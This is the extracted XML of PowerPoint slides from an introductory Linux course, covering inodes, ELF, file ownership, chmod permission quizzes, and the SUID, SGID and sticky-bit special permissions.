    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26349764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Linux abstracts almost everything as a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File metadata is managed via data structure known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>index node </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-node) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Metadata includes file type, permissions, User ID, Group ID, size, time stamps, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> number assigned to every file and directory when created</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Inodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> track file attributes and location on disk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘stat’ command is one way to show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executable and Linkable Format (ELF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defines the structure for binaries, libraries and core files for Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One of the most common binary file formats for Linux</a:t>
            </a:r>
          </a:p>
          <a:p>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Linux Files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23107906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0" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565666" y="1595441"/>
            <a:ext cx="11176000" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intro to Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Linux components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User space and Kernel space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux permissions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful command line interface syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2197679146"/>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Every file and every directory are owned by a single user of that system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every file and every directory have a security group associated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3 types of owners for Linux systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3 types of permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Write </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Google Shape;157;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6551877" y="2668137"/>
            <a:ext cx="5038725" cy="3371850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35436040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Every file and every directory are owned by a single user of that system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every file and every directory have a security group associated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3 types of owners for Linux systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3 types of permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Write </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Google Shape;157;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6551877" y="2668137"/>
            <a:ext cx="5038725" cy="3371850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2372872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Describe the major Linux file system directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Describe the Linux Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Describe shared libraries for Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Describe Pluggable Authentication Modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Describe Linux Daemons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>List four common shell types for Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Describe the difference between user space and Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Describe the three special permissions in Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7180" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Objectives</a:t>
            </a:r>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What command lists permissions? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What permissions does the file and directory show?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What command can change security permissions?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Google Shape;164;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1372150" y="2724134"/>
            <a:ext cx="8892225" cy="1326375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21805059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Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Absolute mode: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What does the following command do? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 754 Helloworld.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Google Shape;186;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3257798" y="1764030"/>
            <a:ext cx="8048625" cy="3914775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21221521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Symbolic mode:</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What does the following command do? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Helloworld.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What does the following command do? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ugo-rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Helloworld.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Google Shape;193;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1223550" y="2418060"/>
            <a:ext cx="3892343" cy="2592349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Google Shape;194;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5396243" y="2418061"/>
            <a:ext cx="6065073" cy="2592349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42160216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Three special permissions available for executable files and directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set-User Identification (SUID): Allows program to be run with permissions from program owner, not the user running it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Administrators unwittingly use SUID as root with third-party applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set-Group Identification (SGID): Allows program to be run with permissions from file group, not the user running it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sticky Bit: Single bit that prevents unprivileged users from removing or renaming a file in the directory unless they own the file or directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also known as restricted deletion flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Commonly found in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/temp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Special Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="5568318"/>
            <a:ext cx="2926080" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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4400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rws</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="4400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rws</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="4400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rwt</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
